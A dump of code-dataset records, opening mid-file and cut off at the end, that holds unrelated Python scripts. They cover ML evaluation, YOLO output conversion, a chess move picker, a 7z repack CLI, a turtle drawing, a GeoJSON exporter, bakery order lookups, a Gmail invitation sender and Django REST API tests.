config['train_annot_file']\nvalid_annot_file = config['valid_annot_file']\nimg_folder = config['image_folder']\ntest_examples = config['test_examples']\nbatch_size = config['batch_size']\ngood_users = config['biologist_users']\n\n\n'''\n Evaluates the model using testing data, printing out an F1 score as well as optimal confidence thresholds for each concept\n'''\ndef evaluate_model(concepts, model_path, min_examples, download_data=False):\n\n classmap = get_classmap(concepts)\n\n if download_data:\n folders = []\n folders.append(test_examples)\n for dir in folders:\n if os.path.exists(dir):\n shutil.rmtree(dir)\n os.makedirs(dir)\n download_annotations(min_examples, concepts, classmap, good_users, img_folder, train_annot_file, valid_annot_file, split=0)\n\n '''\n Initializing model for eval\n '''\n model = load_model(model_path, backbone_name='resnet50')\n model = convert_model(model)\n\n temp = pd.DataFrame(list(zip(classmap.values(), classmap.keys())))\n temp.to_csv('classmap.csv',index=False, header=False)\n test_generator = CSVGenerator(\n valid_annot_file,\n 'classmap.csv',\n shuffle_groups=False,\n batch_size=batch_size\n )\n\n best_f1, best_thresh = f1_evaluation(test_generator, model, save_path=test_examples)\n\n total_f1 = 0\n for concept, f1 in best_f1.items():\n print(\"Concept: \" + classmap[concept])\n print(\"F1 Score: \" + str(f1))\n print(\"Confidence Threshold: \" + str(best_thresh[concept]))\n print(\"\")\n total_f1 += f1\n\n print(\"Average F1: \" + str(total_f1/len(best_f1)))\n print(\"Find evaluation examples in: \" + test_examples)\n '''\n average_precisions = evaluate(test_generator, model, save_path=test_examples)\n\n for concept, (ap, instances) in average_precisions.items():\n print(classmap[concept] +\": \" + str(ap) + \" with \" + str(instances) + \" instances\")\n \n print(\"Find evaluation examples in: \" + test_examples)\n '''\n\nif __name__ == '__main__':\n min_examples = 1000\n concepts = [1629, 1210, 236, 383, 1133]\n model_path = 'current_weights.h5'\n\n evaluate_model(concepts, model_path, min_examples, download_data=False)\n\n","sub_path":"ml/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"619944720","text":"# funcs: convert result from yolo to submit\n# notice: use for 14belt only\n\nimport argparse\nimport json\nimport os\nimport copy\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--json', type=str, default='', help='json file, need cooco format')\nopt = parser.parse_args()\nfp_json = opt.json\n\n\n\n# load coco_list\nwith open(fp_json) as f:\n yolo_list = json.load(f)\n\n# load fn-id map\nwith open('link_image_fn_id.json') as f:\n map = json.load(f)\n\n# xywh > xyxy\nfor i,val in enumerate(yolo_list):\n x,y,w,h = yolo_list[i]['bbox']\n x2,y2 = x+w,y+h\n yolo_list[i]['bbox'] = [x,y,x2,y2]\n\n# # # only keep score that >= 0.2\n# cutted_list = [val for i, val in enumerate(yolo_list) if val['score'] >= 0.2]\n# yolo_list = cutted_list\n\n\n# remove cls_id=0\n# yolo_list = [ ele for ele in yolo_list if ele['category_id'] != 0 ]\n\n\n# image_id fn2int\nyolo_list_debug = copy.deepcopy(yolo_list)\nfor i,val in enumerate(yolo_list):\n fn_no_ext = yolo_list[i]['image_id']\n yolo_list[i]['image_id'] = map[fn_no_ext] # fn_no_ext > int_id\n yolo_list_debug[i]['image_id'] = (map[fn_no_ext], fn_no_ext) # denug\n\n\nfn_json = os.path.basename(fp_json)\nfn_json_no_ext = os.path.splitext(fn_json)[0]\nfn_out = fn_json_no_ext + '_submit.json'\nfp_out = fn_out\n\n\n\nwith open(fp_out, 'w') as fp:\n json.dump(yolo_list, fp )\n # json.dump(to_submit, fp, indent=4)\n\n\nprint('saved, check: ', fp_out)\n\n# with open('submit_debug.json', 'w') as fp:\n# json.dump(yolo_list_debug, fp )\n# # json.dump(to_submit, fp, indent=4)","sub_path":"02result_yolo2submit.py","file_name":"02result_yolo2submit.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"473048177","text":"import chess\nimport random\nfrom FEN_to_Array import FENtoArray\nimport keras\nfrom keras.models import model_from_json\nimport pandas as pd\nfrom pandas import DataFrame\n\nboard = chess.Board()\n\nimport time\n\nmaxMovesToAnalyze = 4\n\nclass predictor():\n \n def __init__(self):\n \n # Load neural network model\n \n self.model_name = \"trained_models/ready_to_deploy\"\n \n json_file = open(self.model_name + '.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n self.loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n self.loaded_model.load_weights(self.model_name + \".h5\")\n # print(\"Loaded model from disk\")\n \n # Load model\n \n self.loaded_model.compile(optimizer = \"adam\", loss = \"binary_crossentropy\", metrics = [\"accuracy\"])\n \n def makePrediction(self,data):\n \n X_test = data.tolist() # Turn into list\n X_test = [X_test] # Make it an array\n X_test = DataFrame.from_records(X_test) # Turn into DataFrame\n \n# print(X_test)\n \n # Run prediction using the neural network\n \n y_pred = self.loaded_model.predict(X_test) # returns the probability of each entry\n \n# print(y_pred)\n \n last = len(y_pred) - 1\n result = y_pred[last]\n \n return(result)\n\npredictor = predictor()\n\nstart = time.time()\n\n#print (result)\n\n\ndef getBestMove(board):\n \n possibleMoves = list(board.legal_moves)\n random.shuffle(possibleMoves)\n \n moveList = possibleMoves # Store it for later, to pick the winning move from\n \n# print(\"Possible Moves:\\n%s\"%(possibleMoves))\n \n winningChance = []\n \n index = 0\n \n for move in possibleMoves:\n \n# print(\"Stepping forward ...\")\n \n nextMove = possibleMoves[0]\n# print(\"Next move:\")\n# print(nextMove)\n possibleMoves.pop(0)\n \n board.push(nextMove)\n \n# print(board)\n \n nextString = board.fen()\n FEN = nextString.split(\" \")\n FEN = FEN[0]\n \n arr = FENtoArray(FEN)\n prediction = predictor.makePrediction(arr)\n \n winningChance.append(prediction)\n \n board.pop()\n \n index += 1\n \n if index >= maxMovesToAnalyze:\n \n# print(\"BREAKING\")\n \n break\n \n# print(\"Moves by win chance:\")\n \n# print(\"winner is:\")\n \n winner = winningChance.index(max(winningChance))\n \n# print (winner)\n \n# print (winningChance)\n# print (moveList)\n \n winningMove = moveList[winner]\n \n# print(\"Returning:\\n%s\" %(winningMove))\n \n end = time.time()\n# print(end - start)\n \n return winningMove\n","sub_path":"getBestMove.py","file_name":"getBestMove.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"256922740","text":"import os\nimport pathlib\nimport re\nimport shutil\nimport subprocess\n\nimport click\nimport git\n\n\n# Define the CLI options\n@click.command()\n@click.argument('SOURCE')\n@click.argument('OUTPUT')\n@click.option('--expandprism', is_flag=True)\n@click.option('--zipmodules', is_flag=True)\ndef cli(source, output, expandprism, zipmodules):\n # Make sure `source` is valid\n if 'libraries' in output:\n raise RuntimeError(\n 'Please point this tool to the root directory of the project'\n )\n\n source = pathlib.Path(source)\n output = pathlib.Path(output)\n\n # Obtain the repo's commit SHA\n repo = git.Repo(str(source))\n latest = repo.commit(repo.active_branch)\n sha = latest.hexsha[:8]\n\n # Extract the remote repo name\n url = list(repo.remotes.origin.urls)[0]\n name = re.match(r'^.*?/([\\w\\-_]*)$', url).group(1)\n\n # Extrapolate the destination file path\n newName = f'{name}-{repo.active_branch}-{sha}.zip'\n newPath = output / 'libraries' / newName\n\n # If the archive already exists, delete it\n if newPath.exists():\n newPath.unlink()\n\n # Open the XML file\n xmlNames = ['commonUI_properties.xml', 'properties.xml']\n xmlPath = None\n for xmlName in xmlNames:\n xmlPath = output / 'antxml' / xmlName\n if xmlPath.exists():\n break\n with open(xmlPath, 'r') as xmlFile:\n xmlData = xmlFile.read()\n\n # Get the current packaged file\n currentName = re.search(\n f'/({name}.*?\\\\.zip)\"',\n xmlData\n ).group(1)\n currentPath = output / 'libraries' / currentName\n if currentPath.exists():\n currentPath.unlink()\n\n # Replace the name in the file\n xmlData = re.sub(\n f'/({name}.*?\\\\.zip)\"',\n f'/{newName}\"',\n xmlData\n )\n with open(xmlPath, 'w') as xmlFile:\n xmlFile.write(xmlData)\n\n # Construct the command arguments and run\n subprocess.run([\n '7z', 'a', '-tzip', '-mmt', '-mx9',\n str(newPath),\n f'{source}/*',\n f'-xr!{source / \".git\"}',\n f'-x@{source / \".gitignore\"}',\n ])\n\n # IF expand flag is specified, delete the mode_modules prism folder and\n # expand the newly created archive into that directory\n if expandprism:\n prismPath = \\\n output / 'node_modules' / '@spectrum-prism' / 'prism-components'\n\n # Delete the existing directory (or link)\n if prismPath.is_file() or prismPath.is_symlink():\n prismPath.unlink()\n elif prismPath.is_dir():\n shutil.rmtree(prismPath)\n\n # Unpack the archive\n subprocess.run([\n '7z', 'x',\n str(newPath),\n f'-o{prismPath}',\n ])\n\n # If zip flag is specified, zip up the node_module folder for building\n if zipmodules:\n # Construct and validate paths\n prismPath = 'node_modules/@spectrum-prism/prism-components'\n nodeZipPath = output / 'libraries' / 'node_modules_unix.zip'\n\n # Delete prism-components from the zip\n subprocess.run([\n '7z', 'd',\n str(nodeZipPath),\n 'node_modules/@spectrum-prism/prism-components'\n ])\n\n # Add current prism-components to the zip\n os.chdir(output)\n subprocess.run([\n '7z', 'u',\n str(nodeZipPath),\n str(prismPath),\n f'-xr!{prismPath}/.git',\n ])\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"spgill/ibm/repack/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22292228","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport turtle\n\nt = turtle\nt.reset()\nN = 512\n# t.pencolor(\"black\")\nt.pensize(5)\nt.speed(3000)\nR = 240\nt.penup()\nt.goto(0,-R)\nt.pendown()\nt.fillcolor(\"gray\")\nt.pencolor(\"gray\")\nturtle.fill(True)\nt.circle(R)\nturtle.fill(False)\n\nt.pencolor(\"black\")\n\ndef draw_taiji(drawYang = False):\n t.left(90)\n d = 360./N\n STEP = R*2./N\n for i in range(0,N):\n t.penup()\n t.goto(0,0)\n t.right(d)\n\n if drawYang:\n t.pendown()\n\n y = int(R - i*STEP)\n\n if y > 0:\n t.pencolor(\"white\")\n t.forward(y)\n if not drawYang:\n t.pendown()\n t.pencolor(\"black\")\n t.forward(R-y)\n else:\n if not drawYang:\n t.pendown()\n t.pencolor(\"black\")\n t.forward(R+y)\n\n if drawYang:\n t.pencolor(\"white\")\n t.forward(-y)\n\ndraw_taiji(False)\nt.clear()\ndraw_taiji(False)\nt.clear()\ndraw_taiji()\n\nraw_input(\"press.....\")\n\n\n","sub_path":"tools/yijing/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638818355","text":"import logging\n\nfrom pydantic import ValidationError\n\nfrom geojson import Feature, FeatureCollection, Point, dumps\nfrom opennem.controllers.stations import get_stations\nfrom opennem.core.facility_duid_map import duid_is_retired\nfrom opennem.db import get_database_session\nfrom opennem.exporter.encoders import OpenNEMGeoJSONEncoder\nfrom opennem.schema.opennem import StationSchema\n\n__all__ = [\"stations_geojson_serialize\"]\n\nlogger = logging.getLogger(__name__)\n\n\ndef stations_geojson_records():\n db = get_database_session()\n\n stations = get_stations(db)\n\n records = []\n\n for station in stations:\n\n geom = None\n\n if station.lat and station.lng:\n geom = Point((station.lat, station.lng))\n\n f = Feature(geometry=geom)\n\n f.properties = {\n \"oid\": station.oid,\n \"ocode\": station.ocode,\n \"station_id\": station.id,\n \"station_code\": station.network_code,\n \"facility_id\": station.network_code,\n \"network\": station.network.label,\n \"network_country\": station.network.country,\n \"state\": station.state.upper() if station.state else None,\n \"postcode\": station.postcode,\n \"name\": station.name,\n \"capacity_registered\": station.capacity_registered,\n \"capacity_aggregate\": station.capacity_aggregate,\n \"duid_data\": [],\n }\n\n for facility in station.facilities:\n if facility.fueltech_id is None:\n continue\n\n if facility.status_id is None:\n continue\n\n if duid_is_retired(facility.code):\n continue\n\n if facility.active is False:\n continue\n\n f.properties[\"duid_data\"].append(\n {\n \"oid\": facility.oid,\n \"duid\": facility.duid,\n \"fuel_tech\": facility.fueltech_id,\n \"fuel_tech_label\": facility.fueltech_label,\n \"fuel_tech_renewable\": facility.fueltech.renewable\n if facility.fueltech\n else None,\n \"commissioned_date\": facility.registered,\n \"decommissioned_date\": facility.deregistered,\n \"status\": facility.status_id,\n \"status_label\": facility.status_label,\n \"unit_id\": facility.unit_id,\n \"unit_number\": facility.unit_number,\n \"unit_size\": facility.unit_capacity,\n \"unit_alias\": facility.unit_alias,\n # capacities for the unit\n \"capacity_registered\": facility.capacity_registered,\n \"capacity_aggregate\": facility.capacity_aggregate,\n # network specific fields (DUID is one)\n \"network_region\": facility.network_region,\n }\n )\n\n if len(f.properties[\"duid_data\"]) > 0:\n records.append(f)\n\n return records\n\n\ndef stations_geojson_records_json(stations: List[StationSchema]):\n records = []\n\n for station in stations:\n\n geom = None\n\n if not station.facilities:\n continue\n\n if station.lat and station.lng:\n geom = Point((station.lng, station.lat))\n\n f = Feature(geometry=geom)\n\n f.properties = {\n # \"oid\": station.oid,\n # \"ocode\": station.ocode,\n \"station_id\": station.id,\n \"station_code\": station.code,\n \"facility_id\": station.code,\n \"network\": station.facilities[0].network.label,\n \"network_country\": station.facilities[0].network.country,\n \"state\": station.state,\n \"postcode\": station.postcode,\n \"name\": station.name,\n \"capacity_registered\": station.capacity_registered,\n # \"capacity_aggregate\": station.capacity_aggregate,\n \"duid_data\": [],\n }\n\n for facility in station.facilities:\n if facility.fueltech is None:\n continue\n\n if facility.status is None:\n continue\n\n if duid_is_retired(facility.code):\n continue\n\n if facility.active is False:\n continue\n\n f.properties[\"duid_data\"].append(\n {\n # \"oid\": facility.oid,\n # \"duid\": facility.duid,\n \"fuel_tech\": facility.fueltech.code,\n \"fuel_tech_label\": facility.fueltech.label,\n \"fuel_tech_renewable\": facility.fueltech.renewable,\n \"commissioned_date\": facility.registered,\n \"decommissioned_date\": facility.deregistered,\n \"status\": facility.status.code,\n \"status_label\": facility.status.label,\n \"unit_id\": facility.unit_id,\n \"unit_number\": facility.unit_number,\n \"unit_size\": facility.unit_capacity,\n \"unit_alias\": facility.unit_alias,\n # capacities for the unit\n \"capacity_registered\": facility.capacity_registered,\n # \"capacity_aggregate\": facility.capacity_aggregate,\n # network specific fields (DUID is one)\n \"network_region\": facility.network_region,\n }\n )\n\n if len(f.properties[\"duid_data\"]) > 0:\n records.append(f)\n\n return records\n\n\ndef stations_geojson_serialize(stations: List[StationSchema]):\n crs = {\n \"type\": \"name\",\n \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"},\n }\n\n stations = stations_geojson_records_json(stations)\n\n geoj = FeatureCollection(stations, crs=crs, name=\"opennem\")\n\n geoj[\"name\"] = \"opennem_stations\"\n geoj[\"crs\"] = crs\n\n geoj_string = dumps(geoj, indent=4, cls=OpenNEMGeoJSONEncoder)\n\n return geoj_string\n\n\nif __name__ == \"__main__\":\n stations_geojson_serialize()\n","sub_path":"opennem/exporter/geojson.py","file_name":"geojson.py","file_ext":"py","file_size_in_byte":6062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"180337598","text":"from first.models import Order, Product_order, Bakery, Category, Account, Product\nimport datetime\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# NEED wordt niet gebruikt\ndef getLastOrdersClient(accountIdIn,N):\n\n list1 = Order.objects.all()[::-1]\n #inverse order because we want the last orders as last for simplicity in the end\n list2 = Product_order.objects.all()\n\n output = []\n\n for order in list1:\n if order.accountId == accountIdIn:\n temp = {}\n temp['date'] = str(order.timePickup.date())\n b = order.timePickup.replace(tzinfo=None).date() - datetime.datetime.now().date()\n temp['NumDaysPast'] = -b.days\n temp['totalPrice'] = order.totalPrice\n temp2 = []\n for product_order in list2:\n if product_order.orderId == order.id:\n dict1 = {}\n dict1['productId'] = product_order.productId\n dict1['amount'] = product_order.amount\n temp2.append(dict1)\n\n temp['products'] = temp2\n\n output.append(temp)\n\n #here we take the last N elements\n return output[:N]\n\n\ndef get_allDayOrders(bakeryId,firstDay,lastDay):\n\n try:\n bakeryObject = Bakery.objects.get(id = bakeryId)\n\n date1 = datetime.datetime.fromtimestamp(firstDay/1000.).date()\n date2 = datetime.datetime.fromtimestamp(lastDay/1000.).date()\n today = datetime.date.today()\n nowHour = datetime.datetime.now().hour\n nowMinute = datetime.datetime.now().minute\n bestelLimitTime = bakeryObject.bestelLimitTime.split(\":\")\n pastBestelLimitTime = (nowHour >= int(bestelLimitTime[0]) and nowMinute >= int(bestelLimitTime[1]))\n diff = (date1-date2).days\n diff2 = (datetime.datetime.now().date() - date1).days\n output = []\n\n for i in range(diff+1):\n dummy = {}\n temp = date1 - datetime.timedelta(i)\n dummy['date'] = int(temp.strftime(\"%s\")) * 1000\n dummy['numDaysPast'] = diff2 + i\n dummy['totalOrders'] = 0\n dummy['totalPrice'] = 0\n diffDays = (today-(datetime.date.fromtimestamp(dummy['date']/1000))).days\n dummy['frozen'] = diffDays > 0 \\\n or ((diffDays == 0) and (pastBestelLimitTime))\n output.append(dummy)\n orders = Order.objects.all().exclude(status='cancelled')\n\n # NEED kan sneller als je in de lijn hierboven gewoon filtert\n for order in orders:\n datePickup = order.timePickup.replace(tzinfo=None).date()\n if order.bakeryId == bakeryId and datePickup >= date2 and datePickup <= date1:\n index = (date1 - datePickup).days\n output[index]['totalOrders'] += 1\n output[index]['totalPrice'] += order.totalPrice\n\n except ObjectDoesNotExist:\n output = 'bakerydoesnotexist'\n\n return output\n\n\ndef get_dayOrder(bakeryId,dateMS):\n date = datetime.datetime.fromtimestamp(dateMS/1000.)\n\n #check if bakery exists\n try:\n a = Bakery.objects.get(id = bakeryId)\n\n list1 = Order.objects.all().exclude(status='cancelled')\n categories = Category.objects.all()\n names = {}\n for category in categories:\n names[str(category.id)] = category.name\n output = {}\n output['date'] = dateMS\n output['totalNumOrders'] = 0\n output['totalMoney'] = 0\n output['orders'] = []\n output['aggregateOrder'] = []\n dummyCategory = []\n dummyName = []\n dummyAmount = []\n dummyId = []\n\n for order in list1:\n if order.timePickup.replace(tzinfo=None).date()== date.date() and order.bakeryId == bakeryId:\n orderId = order.id\n outputClient = {}\n accountId = order.accountId\n account = Account.objects.get(id = accountId)\n outputClient['firstName'] = account.firstname\n outputClient['lastName'] = account.lastname\n outputClient['products'] = []\n outputClient['totalPrice'] = order.totalPrice\n outputClient['remarks'] = order.comment\n outputClient['isPayed'] = 0 #TODO\n\n list2 = Product_order.objects.all()\n for productOrder in list2:\n if productOrder.orderId == orderId:\n product = Product.objects.get(id=productOrder.productId)\n productDict = {}\n productDict['id'] = productOrder.productId\n productDict['amount'] = productOrder.amount\n productDict['price'] = productOrder.price\n productDict['name'] = product.name\n outputClient['products'].append(productDict)\n dummyCategory.append(names[str(product.category_id)])\n dummyName.append(product.name)\n dummyId.append(productOrder.productId)\n dummyAmount.append(productOrder.amount)\n\n\n output['orders'].append(outputClient)\n output['totalNumOrders'] += 1\n output['totalMoney'] += order.totalPrice\n\n aggregate = []\n categoryDict = {}\n for category in dummyCategory:\n categoryDict[str(category)] = {}\n nameDict = {}\n for name in dummyName:\n nameDict[str(name)] = {}\n nameDict[str(name)]['amount'] = 0\n nameDict[str(name)]['id'] = 0\n nameDict[str(name)]['name'] = ''\n\n for i in range(len(dummyName)):\n name = dummyName[i]\n nameDict[str(name)]['name'] = str(name)\n nameDict[str(name)]['amount'] += dummyAmount[i]\n nameDict[str(name)]['id'] = dummyId[i]\n categoryDict[str(dummyCategory[i])][str(name)] = 0\n\n for key1 in categoryDict:\n tempDict = {}\n tempDict['categoryName'] = key1\n tempDict['products'] = []\n for key2 in categoryDict[key1]:\n tempDict['products'].append(nameDict[key2])\n\n aggregate.append(tempDict)\n\n output['aggregateOrder'] = aggregate\n\n except ObjectDoesNotExist:\n output = 'bakerydoesnotexist'\n\n return output\n\n\ndef getPreviousOrdersAcrossBakeries(accountId):\n # loop over all bakeries\n objects = Bakery.objects.all()\n output = []\n for bakery in objects:\n currentBakeryOrders = getPreviousOrders(int(accountId),int(bakery.id))\n if currentBakeryOrders != 'ordersnotfound':\n\n # NEED werkt dit nog?\n # calculate total price for each order with the current prices\n for order in currentBakeryOrders:\n totalPrice = 0\n for product in order['products']:\n totalPrice += product['amount']*product['price']\n order['totalPrice'] = totalPrice\n # add bakery id to order\n order['bakeryId'] = bakery.id\n order['bakeryName'] = bakery.name\n\n # add orders to output\n output.extend(currentBakeryOrders)\n return output\n\n\ndef getPreviousOrders(accountId,bakeryId):\n\n output = 0\n #check if account exists\n\n try:\n a = Account.objects.get(id = accountId)\n except ObjectDoesNotExist:\n output = 'accnotfound'\n #check if bakery exists\n try:\n a = Bakery.objects.get(id = bakeryId)\n except ObjectDoesNotExist:\n output = -'Bakery does not exist'\n\n if output == 0:\n xSort = []\n output = []\n orders = Order.objects.all()\n productOrders = Product_order.objects.all()\n\n for order in orders:\n orderTemp = {}\n if order.accountId == accountId and order.bakeryId == bakeryId:\n orderTemp['date'] = int(order.timePickup.date().strftime(\"%s\")) * 1000\n b = order.timePickup.replace(tzinfo=None).date() - datetime.datetime.now().date()\n orderTemp['numDaysPast'] = -b.days\n orderTemp['id'] = order.id\n orderTemp['products'] = []\n for productOrder in productOrders:\n productDict = {}\n if productOrder.orderId == order.id:\n productId = productOrder.productId\n product = Product.objects.get(id = productId)\n productDict['price'] = productOrder.price\n productDict['name'] = product.name\n productDict['id'] = productId\n productDict['photoId'] = product.photoId\n\n productDict['amount'] = productOrder.amount\n orderTemp['products'].append(productDict)\n orderTemp['status'] = order.status\n xSort.append(orderTemp['numDaysPast'])\n output.append(orderTemp)\n if len(xSort) > 0:\n xSort, output = zip(*sorted(zip(xSort, output)))\n else:\n output = 'ordersnotfound'\n\n return output","sub_path":"src/FRG/orderLookUp.py","file_name":"orderLookUp.py","file_ext":"py","file_size_in_byte":9203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222031633","text":"import os\r\nimport gspread\r\nfrom googleapiclient.discovery import build\r\nimport base64\r\nfrom email.mime.text import MIMEText\r\nfrom apiclient import errors\r\nfrom email.utils import formataddr\r\n\r\n\r\n# 1. Gmail APIのスコープを設定\r\nGMAIL_DEFAULT_SCOPES = gspread.auth.DEFAULT_SCOPES + ['https://www.googleapis.com/auth/gmail.send']\r\n\r\n\r\n# 招待リンク\r\nINVITE_LINK = os.environ[\"DISCORD_INVITE_LINK\"]\r\n\r\n# Spread Sheet\r\ngc = gspread.oauth(GMAIL_DEFAULT_SCOPES)\r\n\r\nsh = gc.open_by_key(\"1QJmehI1eJDcYUAlDVulUe_P-gez_Xd6S5en0jk0A4B0\")\r\nws = sh.worksheet('第2回通過者')\r\n\r\n\r\n# 2. メール本文の作成\r\ndef create_message(to, subject, message_text):\r\n message = MIMEText(message_text)\r\n message['to'] = to\r\n message['from'] = formataddr(('KUN Lab採用 (かめすた)', 'kamesuta@gmail.com'))\r\n message['subject'] = subject\r\n encode_message = base64.urlsafe_b64encode(message.as_bytes())\r\n return {'raw': encode_message.decode()}\r\n\r\n\r\n# 3. メール送信の実行\r\ndef send_message(service, user_id, message):\r\n try:\r\n message = (service.users().messages().send(userId=user_id, body=message)\r\n .execute())\r\n print('Message Id: %s' % message['id'])\r\n return message\r\n except errors.HttpError as error:\r\n print('An error occurred: %s' % error)\r\n\r\n\r\n# 5. アクセストークンの取得\r\nservice = build('gmail', 'v1', credentials=gc.auth)\r\n\r\n\r\ndef send_invite_email(to, user_name, user_token):\r\n # 6. メール本文の作成\r\n subject = '[第2回 KUN Lab選考] 選考通過と、Discordへの参加について'\r\n message_text = f'''\\\r\n{user_name} 様\r\n\r\nこのたびは第2回 KUN Lab選考にご応募いただきありがとうございます。\r\n試験の結果、二次試験にお進みいただきたくご連絡差し上げました。\r\n\r\nついては、Discordの参加をご案内させていただきます。\r\n下記のリンクからご参加いだだいた後、Discord内の案内に従い下記の認証コードの入力をお願いします。\r\n\r\n▼ Discord招待URL\r\n{INVITE_LINK}\r\n\r\n▼ あなたの認証コード (6桁)\r\n{user_token}\r\n※注意 認証コードを他の人に教えないでください。\r\n\r\n-------------------------------------------------------\r\nKUN Lab\r\n採用担当:かめすた\r\nE-mail  kamesuta@gmail.com\r\nTwitter https://twitter.com/Kmesuta\r\n-------------------------------------------------------\r\n'''\r\n message = create_message(to, subject, message_text)\r\n\r\n # 7. Gmail APIを呼び出してメール送信\r\n send_message(service, 'me', message)\r\n\r\n\r\nselectorB = f'B2:B{ws.row_count}'\r\n\r\nsample = ws.range(selectorB)\r\nsa_count = max([cell.row for cell in sample if cell.value])\r\nsh_count = sa_count - 1\r\n\r\nselectorB = f'B2:B{sa_count}'\r\nselectorD = f'O2:O{sa_count}'\r\nselectorN = f'Q2:Q{sa_count}'\r\n\r\nusers = ws.batch_get([selectorB, selectorD, selectorN])\r\n\r\nfor i in range(sh_count):\r\n user_email = users[0][i][0]\r\n user_name = users[1][i][0]\r\n user_token = users[2][i][0]\r\n\r\n send_invite_email(user_email, user_name, user_token)\r\n print(f'Email:{user_email}, ID:{user_name}, Token:{user_token}')\r\n","sub_path":"lab2/send_invite_email.py","file_name":"send_invite_email.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"46878013","text":"class Person:\n first_name: str = ''\n last_name: str = ''\n properties = {}\n\n def __init__(self, first_name: str, last_name: str):\n \"\"\"\n Set the person's first and last name.\n\n :param first_name:\n :param last_name:\n \"\"\"\n self.first_name = first_name\n self.last_name = last_name\n\n def __repr__(self) -> str:\n # This uses the `full_name` property right now but should be improved\n # to provide more information.\n return self.full_name\n\n @property\n def full_name(self) -> str:\n return '{} {}'.format(self.first_name, self.last_name)\n\n\nperson = Person('James', 'Taylor')\nperson.properties['favorite_movie'] = 'Meet Joe Black'\nperson.properties['favorite_food'] = 'Ice-Cream'\n\n#\n\n# No limit to what you can assign to a Dictionary\n\nmy_dict = {} # empty\n\n# Item assignment\nmy_dict['favorite_movie'] = 'Meet Joe Black'\nmy_dict['favorite_food'] = 'Ice-Cream'\nmy_dict['age'] = 36\n\n\n# Assignment at creation\nmy_other_dict = {\n 'fav_movie': 'Meet Joe Black',\n 'favorite_food': 'pizza'\n}\n\nmy_dict['favorite_movie'] # Getting a key from a dictionary\nmy_dict['does_not_exist'] # KeyError\n\n# A way\ntry:\n my_dict['does_not_exist']\nexcept KeyError:\n pass # That's ok, just keep going :)\n\n# A better way\nmy_dict.get('does_not_exist', None) # Return a default value if key doesn't exist\n\n\n\n\n\n\n","sub_path":"code-samples/code-samples/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"453873384","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom .models import FavoriteThings, Categories, AuditLog\n\n\nclass BaseTestCaseHelper(object):\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n self.title = \"Bill Gates\"\n self.category = Categories.objects.get_or_create(name='Person')[0]\n self.favorite_thing = FavoriteThings.objects.create(\n title=self.title,\n category=self.category,\n rank=1\n )\n\n\nclass FavoriteThingsListCreateAPIViewTestCase(BaseTestCaseHelper, TestCase):\n\n def test_api_can_create_a_favorite_thing_and_updates_ranks(self):\n \"\"\"Test the api can create a favorite thing.\"\"\"\n data = {\n 'title': 'Steve Jobs',\n 'category': self.category.id,\n 'rank': 1\n }\n response = self.client.post(\n reverse('list-create-favorite'),\n data,\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.favorite_thing.refresh_from_db()\n self.assertEqual(self.favorite_thing.rank, 2)\n obj = FavoriteThings.objects.get(id=response.data['id'])\n self.assertEqual(obj.rank, 1)\n self.assertEqual(FavoriteThings.objects.count(), 2)\n\n def test_api_can_get_list_of_favorite_things(self):\n \"\"\"Test the api can get list of favorite things.\"\"\"\n response = self.client.get(\n reverse('list-create-favorite'),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n favorite_thing = response.data[0]\n self.assertEqual(favorite_thing['id'], self.favorite_thing.id)\n\n\nclass FavoriteThingsRetrieveUpdateDestroyAPIViewTestCase(BaseTestCaseHelper, TestCase): # noqa\n\n def test_api_can_get_a_favorite_thing(self):\n \"\"\"Test the api can get a given favorite thing.\"\"\"\n response = self.client.get(\n reverse('details-favorite', kwargs={'pk': self.favorite_thing.id}),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data.get('id'), self.favorite_thing.id)\n\n def test_api_can_update_favorite_thing_and_update_ranks(self):\n \"\"\"Test the api can update a given favorite thing.\"\"\"\n change_favorite_thing = {\n 'title': 'Something new',\n 'category': self.category.id,\n 'rank': 1\n }\n res = self.client.put(\n reverse('details-favorite', kwargs={'pk': self.favorite_thing.id}),\n change_favorite_thing,\n content_type='application/json'\n )\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data.get('title'), change_favorite_thing['title'])\n self.assertEqual(res.data.get('category'), self.category.id)\n\n def test_api_can_delete_favorite_thing(self):\n \"\"\"Test the api can delete a given favorite thing.\"\"\"\n res = self.client.delete(\n reverse('details-favorite', kwargs={'pk': self.favorite_thing.id}),\n content_type='application/json'\n )\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n\nclass 